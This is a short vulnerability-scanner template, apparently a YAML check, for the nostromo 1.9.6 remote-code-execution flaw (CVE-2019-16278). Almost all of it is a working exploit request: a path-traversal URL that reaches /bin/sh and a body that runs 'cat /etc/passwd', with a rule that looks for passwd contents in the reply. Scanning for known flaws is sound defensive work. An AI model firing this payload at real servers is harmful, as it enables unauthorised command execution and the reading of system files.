id: nostromo-rce
info:
  name: nostromo 1.9.6 - Remote Code Execution (CVE-2019-16278)
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/.%0d./.%0d./.%0d./.%0d./bin/sh 
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    body: |
      echo
      echo
      cat /etc/passwd 2>&1
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "bin/bash") && StringSearch("body", "root:")
